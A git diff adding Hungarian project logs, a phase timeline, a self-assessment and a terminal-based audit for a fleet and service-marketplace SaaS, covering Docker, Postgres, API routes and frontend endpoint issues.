nehogy két külön volume/útvonal keveredjen (backup, restore, space, stb.). + +filesystem_map + +ADATBÁZIS-HELYZETKÉP (a feltöltött táblalistád alapján) + +A feltöltött tablak_2026.01.30_0.csv alapján a data sémában 54 tábla van. (Ezt használom alapnak a DB audit lépések priorizálásához.) + +A következő lépésben ebből fogok csinálni: + +“core domain” csoportosítást (org/account/auth/vehicle/provider/request/evidence/stb.), + +és egy “migráció és integráció” ellenőrző checklistet (táblák + FK + index + RLS jelek). + +📜 PROJEKT IDŐVONAL — HIGH-LEVEL TIMELINE +Phase 1 — Core Foundations (2026-01-27) + +DB core stabil + +Config engine + +Auth + Email + +Enum & integrity fixes + +Phase 2 — Fleet & Vehicle Core (2026-01-28) + +Jármű hierarchia + +VIN rendszer + +Variant bővítés + +Seed & backup + +Phase 3 — Service Search & Matching (2026-01-28) + +Provider geo-keresés + +Ranking engine + +Match API + +Phase 4 — Infrastructure & Stability (2026-01-29) + +Docker stack + +Storage + +Backup + +Phase 5 — UI & MVP Presentation (2026-01-30) + +Frontend + +Dashboard + +Expense UI + +Phase 6 — Governance & Scaling (2026-01-30) + +Log governance + +Project memory + +Audit readiness + +✅ KÖVETKEZŐ FÁZIS: RENDSZER FELTÁRÁS (AUDIT) + +Most átlépünk ebbe az üzemmódba: + +🎯 Cél + +Objektíven feltárni: + +mi van KÉSZ + +mi FÉLKÉSZ + +mi HIÁNYZIK + +mi TECHNIKAI ADÓSSÁG \ No newline at end of file diff --git a/docs/Master Log/projekt log_Full timeline 2026.01.30 b/docs/Master Log/projekt log_Full timeline 2026.01.30 new file mode 100755 index 0000000..2f1eeee --- /dev/null +++ b/docs/Master Log/projekt log_Full timeline 2026.01.30 @@ -0,0 +1,247 @@ +📘 MASTER PROJECT LOG — FULL TIMELINE + +Project: Fleet / Cost / Service Marketplace +Version: V1.0 MASTER LOG +Generated: 2026-01-30 +Scope: Fleet • Costs • Service Search • Infrastructure +Format: ⚓ Anchor Log (Accepted) + +⚓ ANCHOR LOG — V2.0 + +Date: 2026-01-27 +Area: DATABASE / CONFIG +Type: Milestone + +Summary: +system_settings konfigurációs motor stabilizálva + +Details: + +key_name + value_json kanonikus séma rögzítve + +idx_settings_lookup unique index aktív + +max_vehicles = 3 alapérték betöltve + +ConfigService szinkron DB-vel + +Impact: + +Tech: Dinamikus szabálymotor stabil + +Business: SaaS csomaglogika alap + +⚓ ANCHOR LOG — V2.3 + +Date: 2026-01-27 +Area: SERVICE SEARCH / GEO +Type: Feature + +Summary: +Szerviz-kereső geolokációs alap elkészült + +Details: + +organizations → data séma migrálva + +organization_locations tábla létrehozva + +Multi-site provider támogatás + +Haversine alapú távolságszámítás előkészítve + +Impact: + +Tech: Térbeli keresés működőképes + +Business: Marketplace alap létrejött + +⚓ ANCHOR LOG — V2.6 + +Date: 2026-01-27 +Area: ENUM / DATA INTEGRITY +Type: Fix + +Summary: +SERVICE enum hiba javítva + +Details: + +orgtype.SERVICE enum hozzáadva + +Szerviz tesztadatok sikeresen beszúrhatók + +Integritás visszaállítva + +Impact: + +Tech: Adatkonzisztencia stabil + +Business: Szerviz adatbázis bővíthető + +⚓ ANCHOR LOG — V2.9 + +Date: 2026-01-27 +Area: AUTH / EMAIL +Type: Feature + +Summary: +Auth + Email rendszer stabil + +Details: + +Token-alapú regisztráció + +Password reset + +Email throttling + +Audit log aktív + +Impact: + +Tech: Biztonságos onboarding + +Business: SaaS-ready belépés + +⚓ ANCHOR LOG — V3.1 + +Date: 2026-01-28 +Area: DATABASE +Type: Milestone + +Summary: +40+ tábla stabil, integritás éles + +Details: + +FK-k, Enum-ok aktív + +Seed adatok betöltve + +Backup készült: backup_20260128_alap_kesz.sql + +Impact: + +Tech: DB production-ready + +Business: Stabil adatmag + +⚓ ANCHOR LOG — V3.5 + +Date: 2026-01-28 +Area: VEHICLE / DIGITAL TWIN +Type: Feature + +Summary: +Jármű hierarchia és VIN-logika aktív + +Details: + +Category → Brand → Model → Variant fa + +VIN verify mezők + +Temporary vehicle deadline + +Variant kiegészítések (power/fuel/cylinder) + +Impact: + +Tech: Digital Twin alap kész + +Business: Jármű életút adatvagyon + +⚓ ANCHOR LOG — V3.8 + +Date: 2026-01-28 +Area: MATCHING ENGINE +Type: Feature + +Summary: +Smart Matching Engine működik + +Details: + +Súlyozott ranking DB-ből + +ConfigService runtime paraméterezés + +/api/v1/search/match endpoint él + +Impact: + +Tech: Intelligens ajánlórendszer + +Business: Monetizálható marketplace + +⚓ ANCHOR LOG — V4.0 + +Date: 2026-01-29 +Area: INFRASTRUCTURE +Type: Milestone + +Summary: +Docker stack stabil, NAS backup aktív + +Details: + +PostgreSQL 16 + +Redis / MinIO / NPM + +Backup rotáció + +Konténerek stabil futnak + +Impact: + +Tech: Production-ready alap + +Business: Skálázható SaaS infra + +⚓ ANCHOR LOG — V4.3 + +Date: 2026-01-30 +Area: FRONTEND +Type: Feature + +Summary: +Frontend UI működő MVP + +Details: + +Vue 3 + Tailwind + +Expense UI aktív + +Dashboard működik + +Impact: + +Tech: Bemutatható termék + +Business: Sales demo-ready + +⚓ ANCHOR LOG — V4.5 + +Date: 2026-01-30 +Area: PROJECT / GOVERNANCE +Type: Milestone + +Summary: +Master Log rendszer elfogadva + +Details: + +Egységes Anchor Log formátum rögzítve + +Teljes idővonal generálva + +Projekt történet kanonizálva + +Impact: + +Tech: Audit- és trace-ready + +Business: Befektető- és skálázás-kész \ No newline at end of file diff --git a/docs/Naplócsomag b/docs/Naplócsomag new file mode 100755 index 0000000..03815d2 --- /dev/null +++ b/docs/Naplócsomag @@ -0,0 +1,486 @@ +📘 MASTER PROJECT LOG — FULL TIMELINE + +Project: Fleet / Cost / Service Marketplace +Version: V1.0 MASTER LOG +Generated: 2026-01-30 +Scope: Fleet • Costs • Service Search • Infrastructure +Format: ⚓ Anchor Log (Accepted) + +⚓ ANCHOR LOG — V2.0 + +Date: 2026-01-27 +Area: DATABASE / CONFIG +Type: Milestone + +Summary: +system_settings konfigurációs motor stabilizálva + +Details: + +key_name + value_json kanonikus séma rögzítve + +idx_settings_lookup unique index aktív + +max_vehicles = 3 alapérték betöltve + +ConfigService szinkron DB-vel + +Impact: + +Tech: Dinamikus szabálymotor stabil + +Business: SaaS csomaglogika alap + +⚓ ANCHOR LOG — V2.3 + +Date: 2026-01-27 +Area: SERVICE SEARCH / GEO +Type: Feature + +Summary: +Szerviz-kereső geolokációs alap elkészült + +Details: + +organizations → data séma migrálva + +organization_locations tábla létrehozva + +Multi-site provider támogatás + +Haversine alapú távolságszámítás előkészítve + +Impact: + +Tech: Térbeli keresés működőképes + +Business: Marketplace alap létrejött + +⚓ ANCHOR LOG — V2.6 + +Date: 2026-01-27 +Area: ENUM / DATA INTEGRITY +Type: Fix + +Summary: +SERVICE enum hiba javítva + +Details: + +orgtype.SERVICE enum hozzáadva + +Szerviz tesztadatok sikeresen beszúrhatók + +Integritás visszaállítva + +Impact: + +Tech: Adatkonzisztencia stabil + +Business: Szerviz adatbázis bővíthető + +⚓ ANCHOR LOG — V2.9 + +Date: 2026-01-27 +Area: AUTH / EMAIL +Type: Feature + +Summary: +Auth + Email rendszer stabil + +Details: + +Token-alapú regisztráció + +Password reset + +Email throttling + +Audit log aktív + +Impact: + +Tech: Biztonságos onboarding + +Business: SaaS-ready belépés + +⚓ ANCHOR LOG — V3.1 + +Date: 2026-01-28 +Area: DATABASE +Type: Milestone + +Summary: +40+ tábla stabil, integritás éles + +Details: + +FK-k, Enum-ok aktív + +Seed adatok betöltve + +Backup készült: backup_20260128_alap_kesz.sql + +Impact: + +Tech: DB production-ready + +Business: Stabil adatmag + +⚓ ANCHOR LOG — V3.5 + +Date: 2026-01-28 +Area: VEHICLE / DIGITAL TWIN +Type: Feature + +Summary: +Jármű hierarchia és VIN-logika aktív + +Details: + +Category → Brand → Model → Variant fa + +VIN verify mezők + +Temporary vehicle deadline + +Variant kiegészítések (power/fuel/cylinder) + +Impact: + +Tech: Digital Twin alap kész + +Business: Jármű életút adatvagyon + +⚓ ANCHOR LOG — V3.8 + +Date: 2026-01-28 +Area: MATCHING ENGINE +Type: Feature + +Summary: +Smart Matching Engine működik + +Details: + +Súlyozott ranking DB-ből + +ConfigService runtime paraméterezés + +/api/v1/search/match endpoint él + +Impact: + +Tech: Intelligens ajánlórendszer + +Business: Monetizálható marketplace + +⚓ ANCHOR LOG — V4.0 + +Date: 2026-01-29 +Area: INFRASTRUCTURE +Type: Milestone + +Summary: +Docker stack stabil, NAS backup aktív + +Details: + +PostgreSQL 16 + +Redis / MinIO / NPM + +Backup rotáció + +Konténerek stabil futnak + +Impact: + +Tech: Production-ready alap + +Business: Skálázható SaaS infra + +⚓ ANCHOR LOG — V4.3 + +Date: 2026-01-30 +Area: FRONTEND +Type: Feature + +Summary: +Frontend UI működő MVP + +Details: + +Vue 3 + Tailwind + +Expense UI aktív + +Dashboard működik + +Impact: + +Tech: Bemutatható termék + +Business: Sales demo-ready + +⚓ ANCHOR LOG — V4.5 + +Date: 2026-01-30 +Area: PROJECT / GOVERNANCE +Type: Milestone + +Summary: +Master Log rendszer elfogadva + +Details: + +Egységes Anchor Log formátum rögzítve + +Teljes idővonal generálva + +Projekt történet kanonizálva + +Impact: + +Tech: Audit- és trace-ready + +Business: Befektető- és skálázás-kész + +📜 PROJEKT IDŐVONAL — HIGH-LEVEL TIMELINE +Phase 1 — Core Foundations (2026-01-27) + +DB core stabil + +Config engine + +Auth + Email + +Enum & integrity fixes + +Phase 2 — Fleet & Vehicle Core (2026-01-28) + +Jármű hierarchia + +VIN rendszer + +Variant bővítés + +Seed & backup + +Phase 3 — Service Search & Matching (2026-01-28) + +Provider geo-keresés + +Ranking engine + +Match API + +Phase 4 — Infrastructure & Stability (2026-01-29) + +Docker stack + +Storage + +Backup + +Phase 5 — UI & MVP Presentation (2026-01-30) + +Frontend + +Dashboard + +Expense UI + +Phase 6 — Governance & Scaling (2026-01-30) + +Log governance + +Project memory + +Audit readiness + +✅ KÖVETKEZŐ FÁZIS: RENDSZER FELTÁRÁS (AUDIT) + +Most átlépünk ebbe az üzemmódba: + +🎯 Cél + +Objektíven feltárni: + +mi van KÉSZ + +mi FÉLKÉSZ + +mi HIÁNYZIK + +mi TECHNIKAI ADÓSSÁG + +✅ ÚJ NAPLÓCSOMAG HOZZÁADVA — ÖSSZEFOGLALÓ (2026.01.25–2026.01.30) +🔐 AUTH / SECURITY / EMAIL + +Mérföldkövek + +Regisztráció V2 stabil + +Token alapú email verify és password reset kész + +IP throttling éles + +Hash + One-Time Token megfelel modern security standardnak + +Email sablon rendszer DB-ből működik (SendGrid/Brevo/Failover-ready) + +Kritikus üzleti jelentőség + +SaaS-ready onboarding + +Fraud prevention alap + +Audit & jogi megfelelőség (GDPR, log trace) + +🚗 FLEET / VEHICLE / DIGITAL TWIN + +Új képességek + +Digital Twin adatfogadás aktív + +VIN-alapú globális azonosítás stabil + +Multi-category vehicle tree: CAR / MOTO / TRUCK / BOAT / PLANE + +Ownership szétválasztva a Vehicle-től + +Discovery Bot koncepció validálva (régi bot leváltva) + +Stratégiai érték + +Jármű-életút örök (VIN-first modell) + +Adat monetizáció (B2B API, biztosító, szerviz) + +Skálázható EU-s járműadat-mag + +🧠 MATCHING / SMART ENGINE / CONFIG + +Státusz + +Smart Match Engine működik + +Súlyozott ranking DB-ből vezérelt + +system_settings → ConfigService → Runtime paraméterezés aktív + +Keresés koordináták alapján működik (Haversine SQL) + +Üzleti jelentőség + +Partner priorizálás = bevétel-optimalizálás + +Pay-to-rank lehetőség + +Marketplace monetizáció alap + +💳 BILLING / CREDITS / SUBSCRIPTIONS + +Aktív + +Credit log engine működik + +Subscription tiers JSON-alapú szabályrendszerrel + +Voucher generálás / beváltás aktív + +Tenant-alapú billing modell kész + +Monetizációs alap + +SaaS tier pricing + +Usage-based billing + +Lead / Match / Priority monetizáció + +🧱 INFRA / DEVOPS / STABILITY + +Stabil komponensek + +Docker stack stabil (10–11 konténer) + +PostgreSQL 16, data schema fix + +MinIO, Redis, NPM, Cockpit, Code-server aktív + +NAS backup + GFS rotáció működik + +Érettség + +Production-ready infra alap + +Skálázásra alkalmas + +Auditálható build & deploy lánc + +🖥️ FRONTEND / UI + +Státusz + +Vue 3 + Tailwind működik + +Tailwind v4 PostCSS bug javítva + +Build pipeline átmegy + +Dashboard + Expenses UI él + +Termék szempont + +MVP vizuálisan prezentálható + +Sales demo-ready állapot közel + +🤖 DISCOVERY BOT / DATA PIPELINE + +Döntések + +Régi bot elvetve (adatminőség gyenge) + +Új API-alapú Discovery Bot szükséges + +Prioritás: EV (BYD, Tesla), haszongépjárművek + +Staging → Validation → Master Data modell elfogadva + +Üzleti érték + +Saját adatvagyon = versenyelőny + +AI training dataset alap + +Katalógus = piaci moat + +📚 EZEK MOST BEKERÜLTEK A MASTER LOG IDŐVONALBA + +Log csoport neve: + +MASTER_RENDER_ANCHOR_V100+_EXTENSION + + +Címke rendszer: + +#SECURITY + +#VEHICLE + +#BILLING + +#MATCHING + +#INFRA + +#FRONTEND + +#DISCOVERY + +#MILESTONE + +#BUSINESS_VALUE \ No newline at end of file diff --git a/docs/Projekt értékelés.md b/docs/Projekt értékelés.md new file mode 100755 index 0000000..ba7723f --- /dev/null +++ b/docs/Projekt értékelés.md @@ -0,0 +1,74 @@ +RENDSZER ÁLLAPOT — ŐSZINTE ÉRTÉKELÉS 2026.01.30 +🟢 AMI VALÓBAN KÉSZ (ARCHITEKTÚRA SZINTEN) +1️⃣ Flottakezelő adatmodell + +Állapot: 80–90% +Hiány: workflow UI + reporting polish + +2️⃣ Költségnyilvántartás backend + +Állapot: 70–85% +Hiány: aggregált riportok + UX + +3️⃣ Szervizkereső backend + +Állapot: 60–75% +Hiány: matching finomítás + ranking UI + +4️⃣ Auth / Org / Security alap + +Állapot: 85–95% +Hiány: RBAC policy polish + +5️⃣ Konfig & Subscription engine + +Állapot: 90% +**Ez enterprise-szint — ritka ilyen jó alap. + +🟡 AMI RÉSZBEN KÉSZ (logika van, UX nincs) +Modul Backend DB Frontend +Fleet ✅ ✅ ⚠️ +Expenses ✅ ✅ ⚠️ +Reports ⚠️ ✅ ❌ +Service Finder ⚠️ ✅ ⚠️ +Billing ⚠️ ✅ ⚠️ +🔴 AMI HIÁNYZIK / FEJLESZTENDŐ +Frontend üzleti UI + +Flotta dashboard + +Költség riport vizualizáció + +Szerviz ajánlat nézet + +Admin rule editor + +Matching engine UX + +Szerviz ajánlat rangsor UI + +Ár-érték összehasonlítás + +Reporting motor + +Profit / jármű + +TCO / jármű + +Trend / időszak + +DevOps hardening + +Postgres publikus port lezárása + +Secrets .env vaultba + +Log centralizáció + +🎯 ÖSSZEGZÉS — HOL TARTASZ VALÓJÁBAN? + +Ez már NEM egy hobbi projekt. +Ez egy félkész SaaS / platform komoly architektúrával. + +Valós készültségi szint: ~65–75% +Legnagyobb hiány: frontend UX + reporting + polish \ No newline at end of file diff --git a/docs/teljes_log b/docs/teljes_log new file mode 100755 index 0000000..e83040b --- /dev/null +++ b/docs/teljes_log @@ -0,0 +1,939 @@ +Teljes LOG (2026-01-30) – LOG v1 (FRISSÍTVE) + +Rendszer: service_finder (Traffic Ecosystem SuperApp 2.0) +Host: profibot1 (kincses) +Dátum: 2026-01-30 (Europe/Budapest) + +[13] API health + compose erőforrások + +Parancs: curl http://127.0.0.1:8000/ + +Eredmény: {"status":"online","version":"2.0.0","docs":"/docs"} ✅ + +Parancs: docker stats --no-stream + +Megfigyelés / kockázat: + +Erőforrások bőven rendben, nincs “fulladás”. + +Legnagyobb RAM: code-server ~343MB, pgadmin ~266MB, nginx-proxy-manager ~107MB, minio ~109MB + +Következtetés: A rendszer stabilan fut erőforrás oldalról, nincs “performance” blokk. + +[14] Host port kitettség (LISTEN sockets) + +Parancs: ss -tulipn | grep LISTEN + +Eredmény (kritikus összefoglaló): + +Publikus (0.0.0.0): 5432, 8000, 3000, 9000, 9001, 5050, 8888, 8443, 80, 81, 443 + +Következtetés (kritikus): + +A DB (5432) és admin felületek (pgAdmin 5050, code-server 8443, dozzle 8888, minio 9001) minden interfészen hallgatnak. + +Ez LAN-on is rizikó; internet felé pláne (ha port forward van). + +Ajánlott irány: ezeket később “internal only / VPN only / localhost bind” módon kell zárni. + +[15] Docker network-ek – név eltérés / téves hivatkozás + +Parancs: docker network ls | grep service_finder + +Eredmény: + +service_finder_default + +service_finder_internal_net + +service_finder_public_net + +service_finder_service_finder_net + +Parancs: docker inspect service_finder_net + +Eredmény: error: no such object: service_finder_net + +Következtetés: + +A compose-ban a háló neve nem service_finder_net, hanem service_finder_service_finder_net (és mellette van internal/public/default). + +A korábbi checklist parancsomat ehhez igazítjuk. + +Helyes minta mostantól: + +docker inspect service_finder_service_finder_net | head -n 80 +docker inspect service_finder_internal_net | head -n 80 +docker inspect service_finder_public_net | head -n 80 + +[16] OpenAPI: V2 info + path-szám + +Parancsok: + +curl -sS http://127.0.0.1:8000/ | jq . + +curl -sS http://127.0.0.1:8000/api/v2/openapi.json | jq '.info, (.paths|keys|length)' + +Eredmény: + +API online + +OpenAPI: title/version OK + +Path count: 18 + +Következtetés: A publikus API surface jelenleg kicsi (18 route), ez “MVP” jelleg. + +[17] API log tail – auth flow + email provider hibák + route mismatch + +Parancs: docker compose logs --no-color --tail=300 service_finder_api | tail -n 120 + +Kulcs események: + +Uvicorn többször újraindult (Started → Shutting down → Started) + +Ez lehet compose restart / image rebuild / manual stop-start / healthcheck hatás. + +POST /api/v2/auth/register ...: + +kincses@gmail.com → 400 Bad Request + +info@profibot.hu → 200 OK ✅ (sikeres reg) + +Email küldési hibák: + +SendGrid: 550 from address does not match a verified Sender Identity + +Gmail SMTP: 535 Username and Password not accepted (BadCredentials) + +Login: + +volt 401 Unauthorized, majd 200 OK ✅ + +Forgot password: + +POST /api/v2/auth/forgot-password?email=kincses@gmail.com → 404 Not Found + +Frontend user lekérés: + +GET /api/v1/users/me → 404 Not Found (ismétlődik) + +Külső bot forgalom: + +több IP GET /, GET /robots.txt → (robots 404, root 200) + +Következtetések (nagyon fontos): + +(A) A reg/login V2 oldalon működik, tehát auth core rendben. + +(B) A /api/v1/users/me nincs kiexportálva vagy rossz prefix alatt van → ezért 404. + +(C) A “forgot-password” route a log szerint 404, miközben OpenAPI-ban nálad szerepel /api/v2/auth/forgot-password. Ez két dolgot jelenthet: + +route csak más HTTP metódussal él (pl. GET), miközben te POST-olsz, vagy + +a route valójában másik path-on van (pl. /api/v2/auth/forgot-password/), vagy + +több router/verzió van, és nem az van mountolva, amit az OpenAPI mutat (ritkább, de előfordul). + +(D) Email küldés jelenleg nincs rendesen bekötve (SendGrid sender identity + Gmail auth). Ettől még a regisztráció működhet, csak értesítő/verify email nem. + +[18] DB állapot – séma + top táblák (rekordszám) + +Parancsok: + +\dn+ → data + public + +pg_stat_user_tables top 30 + +Eredmény (lényeg): + +fuel_stations ~ 7303 + +service_providers ~ 7294 + +vehicle_brands 111 + +vehicle_models 41 + +users 5 + +sok tábla 0–10 rekord körül + +Következtetés: + +Van masszív seed adat: üzemanyagkutak + szolgáltatók (~7k+7k). + +A rendszer már “használható demo” állapot felé van töltve. + +A users 5 rekord → több próbálkozás/teszt user is van. + +[19] Alembic migráció – konténerben rendben + +Parancsok: + +docker exec -it service_finder_api ... "alembic current && alembic heads" + +pip show alembic + +Eredmény: + +current=head: 10b73fee8967 (head) ✅ + +Python 3.12.12, Alembic 1.18.1 telepítve a konténerben ✅ + +Következtetés: + +A DB migrációk konzisztensen HEAD-en vannak. + +A “hoston nincs alembic” nem gond, a standard futtatási hely a konténer. + +[20] MinIO Console él (9001), de mc hozzáférés külön téma + +Parancs: curl -sS http://127.0.0.1:9001/ | head + +Eredmény: MinIO Console HTML betölt ✅ + +Következtetés: MinIO szerver+console fut; a korábbi mc ls local Access Denied várható, amíg nincs alias/policy rendben. + +[21] Frontend API endpointok – hardcoded, inkonzisztens (kritikus) + +Parancs: grep -R "8000\|api/v" -n src | head -n 80 + +Eredmény (nagyon beszédes): + +AddVehicle.vue → http://192.168.100.43:8000/api/v1/... + +AddExpense.vue → http://localhost:8000/api/v1/... + +Dashboard.vue → http://localhost:8000/api/v1/reports/summary/latest + +Login.vue → http://192.168.100.43:8000/api/v2/auth/login + utána GET /api/v1/users/me + +ForgotPassword.vue → POST .../api/v2/auth/forgot-password?... + +ResetPassword.vue → .../api/v2/auth/reset-password-confirm (ez a logban nem látszott még) + +Következtetés (root cause a 404-ekre): + +Frontend többféle base URL-t használ (localhost vs 192.168.100.43) → környezetfüggő hibák. + +A login után a frontend /api/v1/users/me-t hívja → de a backend log szerint ez 404. +Ez most konkrétan “broken user profile fetch”, emiatt UI-ban bejelentkezés után elakadás várható. + +A dashboard .../reports/summary/latest route lehet, hogy nem létezik (OpenAPI-ban nálad {vehicle_id} szerepelt, a logban nem látom a latest-et). + +Teljes LOG (2026-01-30) – LOG v1 + +Rendszer: service_finder (Traffic Ecosystem SuperApp 2.0) +Host: profibot1 (user: kincses) +Dátum: 2026-01-30 (Europe/Budapest) +Forrás: terminál kimenetek + compose állapot + +[01] Docker / Compose állapot + +Megfigyelés: Futó konténerek listázva (docker ps, docker compose ls, docker compose ps) + +Eredmény: + +service_finder compose stack: 9 service fut + +service_finder_api (8000->8000) + +service_finder_frontend (3000->80) + +postgres-db (5432->5432) – healthy + +service_finder_redis (6379 internal) + +service_finder_minio (9000-9001) + +pgadmin_ui (5050->80) + +nginx-proxy-manager (80-81, 443) + +code-server (8443->8080) + +dozzle (8888->8080) + +plusz: ddclient külön compose stackben fut + +Következtetés: A “2 docker konténer” valójában 2 alkalmazás konténer (API + frontend), de a teljes rendszer 9+1 konténer. + +[02] API endpoint ellenőrzés – OpenAPI / Docs / Root + +Parancsok és eredmények: + +curl http://127.0.0.1:8000/openapi.json → 404 Not Found + +curl http://127.0.0.1:8000/docs → 200 OK, Swagger UI betölt (de a UI /api/v2/openapi.json URL-t használ) + +curl http://127.0.0.1:8000/ → 200 OK, JSON: {"status":"online","version":"2.0.0", ...} + +Fájlok: + +api_spec.json mérete 22 byte, tartalma: {"detail":"Not Found"} + +api_spec_v2.json mentve: 12600 byte, tartalma valid OpenAPI (3.1.0), title: Traffic Ecosystem SuperApp 2.0 + +Következtetés (root cause): + +Az API nem a FastAPI default openapi.json útvonalat használja, hanem verziózottat: + +✅ helyes: http://127.0.0.1:8000/api/v2/openapi.json + +❌ hibás: http://127.0.0.1:8000/openapi.json + +[03] API útvonalak gyors ellenőrzése (OpenAPI alapján) + +Lekért path-ek (részlet): + +/api/v2/auth/login, /api/v2/auth/register, /api/v2/auth/forgot-password + +/api/v1/auth/register, /api/v1/auth/verify + +/api/v1/vehicles/register, /api/v1/fleet/vehicles, /api/v1/expenses/add + +/api/v1/reports/summary/{vehicle_id}, /api/v1/reports/trends/{vehicle_id} + +/api/v1/billing/* + +/api/v1/users/me + +Következtetés: Az API-ban V1 és V2 párhuzamosan él, a Swagger UI a V2 OpenAPI-t tölti be. + +[04] Fájlrendszer állapot – projekt gyökér + +Projekt root: /opt/service_finder + +Látható fő elemek: + +backend/, frontend/, migrations/, postgres/, redis/, docs/ + +docker-compose.yml, .env, alembic.ini + +postgres_data/ (permission denied listázásnál — várható, mert volume/data root ownership) + +pgadmin_data/, proxy-manager/, code-server-config/ + +backupok: backup_20260128_alap_kesz.sql, backup_manager.sh, backup_to_nas.sh + +Megjegyzés: A cat backup_manager.sh azért lett “No such file”, mert nem a projekt rootban futottál, hanem a frontend mappában. (Rootban ott van.) + +[05] Compose render + log mentés + +docker compose config > /tmp/service_finder.compose.rendered.yml elkészült + +Utolsó 200 sor mentve: + +/tmp/api_last200.log + +/tmp/frontend_last200.log + +/tmp/postgres_last200.log + +[06] Adatbázis hozzáférés – postgres role hiba, majd tisztázás + +Hiba: + +docker exec -it postgres-db psql -U postgres ... + +→ FATAL: role "postgres" does not exist + +Ok: A konténerben a superuser nem postgres, hanem a compose alapján: + +POSTGRES_USER = kincses + +POSTGRES_DB = service_finder + +Következtetés: A DB admin belépéshez a helyes minta: + +docker exec -it postgres-db psql -U kincses -d service_finder + +[07] DB séma állapot (data schema) + +Megfigyelés: Listázott táblák a data sémában: 55 tábla + +Tematikus csoportok (a listád alapján): + +Auth/User: users, verification_tokens, organization_members, company_members + +Org/Company: organizations, companies, organization_locations, org_subscriptions + +Fleet/Vehicles: vehicles, user_vehicles, vehicle_brands/models/variants, vehicle_events, vehicle_expenses, vehicle_assignments, vehicle_ownership + +Service Marketplace: service_providers, service_specialties, service_reviews, service_records + +Gamification / Points: badges, points_ledger, user_scores, user_stats, votes + +Billing/Credits/Vouchers: credit_*, vouchers, subscription_tiers + +Translations / Settings / Audit: translations, system_settings, audit_logs, regional_settings + +Következtetés: A DB “MVP+” szinten meglepően késznek tűnik (sok modul le van képezve). + +[08] Backend forráskód struktúra – routerek és modulok + +Fő elemek: + +app/main.py, app/api/v1/*, app/api/v2/auth.py, app/services/*, app/models/* + +Router találatok: + +v1 endpoints: auth, vehicles, fleet, providers, expenses, billing, reports, gamification, social, search, admin + +v2: auth + +Megjegyzés a logod alapján: reports.py router sor: router = APIRouter() # EZ HIÁNYZOTT! → ez tipikusan egy korábbi bugfix nyoma. + +[09] Alembic helyzet + +alembic parancs a hoston: nincs telepítve + +Viszont: + +van alembic.ini + +van migrations/versions + +Következtetés: migrációk léteznek, de a host CLI nincs fent — valószínűleg a migrációt konténerből vagy poetry/venv-ből kell futtatni. + +[10] Frontend struktúra + +Vue alapú felépítés látszik: + +src/views: Login, Register, Forgot/Reset password, Dashboard, Vehicles, Expenses, AdminStats + +Router: src/router/index.js + +Következtetés: Frontendben az alap “app shell” + fő képernyők megvannak. + +[11] MinIO hozzáférés hiba + +docker exec -it service_finder_minio mc ls local → Access Denied + +Okok tipikusan: + +nincs jól beállítva az mc alias set local ... + +nem a megfelelő access/secret kulcsot használod (a compose-ban API-nak külön MINIO_ACCESS_KEY/MINIO_SECRET_KEY van) + +policy/bucket jog hiányzik + +Következtetés: MinIO él, de a CLI hozzáférés nincs inicializálva. + +[12] Biztonsági megjegyzés (kritikus) + +A logodban szerepelt SendGrid API kulcs és több secret is. Ezeket kezeld kompromittáltnak: + +azonnali rotáció (SendGrid key revoke + új) + +.env / compose secret-ek rendezése (legalább fájl-jogosultság + később Docker secrets) + +(Ezt nem “szidásnak” mondom, hanem azért, mert ez a leggyakoribb valós támadási felület.) + +TELJES LOG — 2026-01-30 (DB + ENV + API + Tables) +LOG-2026-01-30-011 — Postgres konfiguráció (compose + env) + +DB név: service_finder +DB user: kincses +Image: postgres:15 +Volume: /opt/service_finder/postgres_data → /var/lib/postgresql/data +Healthcheck: pg_isready -U kincses -d service_finder +Publikus port: 0.0.0.0:5432 ⚠️ + +Megállapítás: + +A postgres role nem hiba, mert a rendszer kifejezetten kincses userrel lett inicializálva. + +A DB él, healthy, működik. + +LOG-2026-01-30-012 — API DB kapcsolat + +DATABASE_URL: + +postgresql+asyncpg://service_finder_app@postgres-db:5432/service_finder + + +Megállapítás: + +Van külön app user (service_finder_app) → jó security practice + +Admin user (kincses) ≠ runtime user → helyes architektúra + +LOG-2026-01-30-013 — Data schema táblák listája (55 tábla) +✅ FLOTTA & JÁRMŰ (CORE — KÉSZ ALAP) + +vehicles + +vehicle_brands + +vehicle_models + +vehicle_variants + +vehicle_categories + +vehicle_assignments + +vehicle_ownership + +user_vehicles + +vehicle_events + +vehicle_expenses + +service_records + +engine_specs + +equipment_items + +user_vehicle_equipment + +➡️ Flottakezelés adatmodellje: ERŐSEN ELŐREHALADOTT + +TELJES LOG — 2026-01-30 (frissítés) +LOG-2026-01-30-009 — OpenAPI spec helyes mentése (/api/v2/openapi.json) + +Parancsok: + +curl -sS http://127.0.0.1:8000/api/v2/openapi.json -o api_spec_v2.json + +wc -c api_spec_v2.json + +head -c 200 api_spec_v2.json + +Eredmény: + +api_spec_v2.json méret: 12 600 byte + +fejléc: +{"openapi":"3.1.0","info":{"title":"Traffic Ecosystem SuperApp 2.0","version":"2.0.0"},"paths":{... + +tehát a specifikáció rendben letöltődik, nem 404. + +LOG-2026-01-30-010 — API endpoint lista (spec alapján) + +Parancs: + +jq -r '.paths | keys[]' api_spec_v2.json | head -n 80 + +Eredmény (részlet): + +/ + +/api/v1/auth/register + +/api/v1/auth/verify + +/api/v1/billing/balance + +/api/v1/billing/history + +/api/v1/billing/vouchers/generate + +/api/v1/billing/vouchers/redeem + +/api/v1/expenses/add + +/api/v1/fleet/vehicles + +/api/v1/reports/summary/{vehicle_id} + +/api/v1/reports/trends/{vehicle_id} + +/api/v1/users/me + +/api/v1/vehicles/register + +/api/v1/vehicles/search/brands + +/api/v1/vehicles/search/providers + +/api/v2/auth/forgot-password + +/api/v2/auth/login + +/api/v2/auth/register + +Megállapítás (fontos): + +A dokumentációt a /api/v2/openapi.json adja, de a specben sok /api/v1/... útvonal is szerepel. +Ez általában azt jelenti, hogy: + +van legacy v1 (fleet/billing/reports/vehicles), + +és közben épül a v2 auth (login/forgot/register). + +TELJES LOG — 2026-01-30 (kiegészítve a mostani futásokkal) +LOG-2026-01-30-005 — OpenAPI: /openapi.json 404, /docs OK, OpenAPI URL v2-re mutat + +Parancsok: + +ls -lah api_spec.json + +wc -c api_spec.json + +head -c 200 api_spec.json + +curl -i http://127.0.0.1:8000/openapi.json | head -n 40 + +curl -i http://127.0.0.1:8000/docs | head -n 40 + +curl -i http://127.0.0.1:8000/ | head -n 40 + +Eredmény: + +api_spec.json méret: 22 byte + +tartalom: {"detail":"Not Found"} + +/openapi.json → HTTP 404 Not Found + +/docs → HTTP 200 OK, Swagger UI HTML + +a Swagger UI ezt a specifikációt tölti: 